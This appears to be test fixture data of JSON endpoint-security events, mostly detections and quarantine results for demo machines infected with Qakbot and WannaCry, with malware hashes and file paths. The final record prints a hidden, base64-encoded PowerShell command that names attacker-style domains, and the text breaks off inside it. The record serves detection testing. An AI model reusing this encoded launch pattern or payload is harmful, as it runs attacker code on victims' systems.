+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4A